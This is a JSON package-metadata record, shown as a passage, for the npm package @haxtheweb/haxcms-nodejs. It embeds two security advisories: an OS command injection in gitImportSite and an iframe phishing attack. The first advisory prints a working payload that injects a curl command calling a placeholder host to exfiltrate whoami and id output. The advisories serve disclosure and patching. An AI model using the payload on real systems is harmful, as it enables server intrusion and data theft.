’proc_open’, yielding OS command injection.\n\n### Details\nThe vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.\n![gitImportSite](https://github.com/user-attachments/assets/af9935ef-4735-446d-833f-2c2590ff1508)\n\n#### Affected Resources\n• Operations.php:2103 gitImportSite()\n• \\\u003cdomain\\\u003e/\\\u003cuser\\\u003e/system/api/gitImportSite\n\n\n\n### PoC\nTo replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').\n\n1. Start a webserver.\n![webserver](https://github.com/user-attachments/assets/8594f9b1-67fa-4352-bbc3-310bb164ec9b)\n\n2. Initiate a request to the ’archiveSite’ endpoint.\n![archiveSite](https://github.com/user-attachments/assets/08503f36-d984-4d53-8fe6-577ad78d5eb7)\n\n3.  Capture and modify the request in BurpSuite.\n![request-modification](https://github.com/user-attachments/assets/61cd211e-afd3-453e-b86b-58bccffaf824)\n\n\n\n\n\n\n4. Observe command output in the HTTP request from the server.\n![command-output](https://github.com/user-attachments/assets/35f32274-b709-41d5-adaa-bea48f5cf33c)\n\n\n#### Command Injection Payload\n```Bash\nhttp://\u003cIP\u003e/.git;curl${IFS}\u003cIP\u003e/$(whoami)/$(id)#=abcdef\n```\n\n\n### Impact\nAn authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-06-09T20:30:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.5,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-g4cf-pp4x-hqgw","https://github.com/haxtheweb/haxcms-nodejs/commit/5131fea6b6be611db76a618f89bd2e164752e9b3","https://nvd.nist.gov/vuln/detail/CVE-2025-49141","https://github.com/advisories/GHSA-g4cf-pp4x-hqgw"],"source_kind":"github","identifiers":["GHSA-g4cf-pp4x-hqgw","CVE-2025-49141"],"repository_url":"https://github.com/haxtheweb/issues","blast_radius":1.0,"created_at":"2025-06-09T21:08:48.053Z","updated_at":"2026-09-14T14:07:01.182Z","epss_percentage":0.01452,"epss_percentile":0.71845,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nNGNmLXBwNHgtaHFnd84ABIzw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nNGNmLXBwNHgtaHFnd84ABIzw","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"11.0.3","vulnerable_version_range":"\u003c 11.0.3"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nNGNmLXBwNHgtaHFnd84ABIzw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12M3BoLTJxNXEtY2c4OM4ABIzu","url":"https://github.com/advisories/GHSA-v3ph-2q5q-cg88","title":"@haxtheweb/haxcms-nodejs Iframe Phishing vulnerability","description":"### Summary\n\nIn the HAX site editor, users can create a website block to load another site in an iframe. The application allows users to supply a target URL in the website block. When the HAX site is visited, the client's browser will query the supplied URL.\n\n### Affected Resources\n\n- [Operations.php:868](https://github.com/haxtheweb/haxcms-php/blob/master/system/backend/php/lib/Operations.php#L868)\n- `https://\u003csite\u003e/\u003cuser\u003e/system/api/saveNode`\n\n### PoC\n\n1. Set the URL in an iframe pointing to an attacker-controlled server running Responder\n\n![image](https://github.com/user-attachments/assets/baac23ec-7b1e-49cf-864d-c3550b2c71bf)\n\n2. Once another user visits the site, they are prompted to sign in.\n\n![image](https://github.com/user-attachments/assets/a3a0b75d-e12f-49cf-8669-9686353a92e2)\n\n3. If a user inputs credentials, the username and password hash are outputted in Responder.\n\n![image](https://github.com/user-attachments/assets/428542d3-8cf5-4bfa-b759-e630c3ee6ac3)\n\n### Impact\n\nAn authenticated attacker can create a HAX site with a website block pointing at an attacker-controlled server running Responder or a similar tool. The attacker can then conduct a phishing attack by convincing another user to visit their malicious HAX site to harvest credentials.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-09T19:07:21.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/haxtheweb/issues/security/advisories/GHSA-v3ph-2q5q-cg88","https://github.com/haxtheweb/haxcms-nodejs/commit/5368eb9b278ca47cd9a83b8d3e6216375615b8f5","https://nvd.nist.gov/vuln/detail/CVE-2025-49139","https://github.com/advisories/GHSA-v3ph-2q5q-cg88"],"source_kind":"github","identifiers":["GHSA-v3ph-2q5q-cg88","CVE-2025-49139"],"repository_url":"https://github.com/haxtheweb/issues","blast_radius":1.0,"created_at":"2025-06-09T20:08:45.091Z","updated_at":"2026-09-25T12:07:56.152Z","epss_percentage":0.0037,"epss_percentile":0.28095,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12M3BoLTJxNXEtY2c4OM4ABIzu","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12M3BoLTJxNXEtY2c4OM4ABIzu","packages":[{"ecosystem":"npm","package_name":"@haxtheweb/haxcms-nodejs","versions":[{"first_patched_version":"11.0.0","vulnerable_version_range":"\u003c 11.0.0"}],"purl":"pkg:npm/%40haxtheweb%2Fhaxcms-nodejs"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12M3BoLTJxNXEtY2c4OM4ABIzu/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@haxtheweb/haxcms-nodejs","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@haxtheweb/haxcms-nodejs","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@haxtheweb/haxcms-nodejs/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-27T12:18:11.041Z","issues_count":0,"pull_requests_count":43,"avg_time_to_close_issue":null,"avg_time_to_close_pull_request":146286.66666666666,"issues_closed_count":0,"pull_requests_closed_count":42,"pull_request_authors_count":7,"issue_authors_count":0,"avg_comments_per_issue":null,"avg_comments_per_pull_request":1.1627906976744187,"merged_pull_requests_count":39,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":33,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":165021.78787878787,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":33,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":1.1515151515151516,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":30,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/haxtheweb%2Fhaxcms-nodejs/issues","maintainers":[{"login":"btopro","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/btopro"}],"active_maintainers":[{"login":"btopro","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/btopro"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@haxtheweb%2Fhaxcms-nodejs/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@haxtheweb%2Fhaxcms-nodejs/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@haxtheweb%2Fhaxcms-nodejs/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@haxtheweb%2Fhaxcms-nodejs/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@haxtheweb%2Fhaxcms-nodejs/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@haxtheweb%2Fhaxcms-nodejs/codemeta","maintainers":[{"uuid":"btopro","login":"btopro","name":null,"email":"hax@psu.edu","url":null,"packages_count":680,"html_url":"https://www.npmjs.com/~btopro","role":null,"created_at":"2024-06-17T20:50:12.581Z","updated_at":"2024-06-17T20:50:12.581Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/btopro/packages"}]}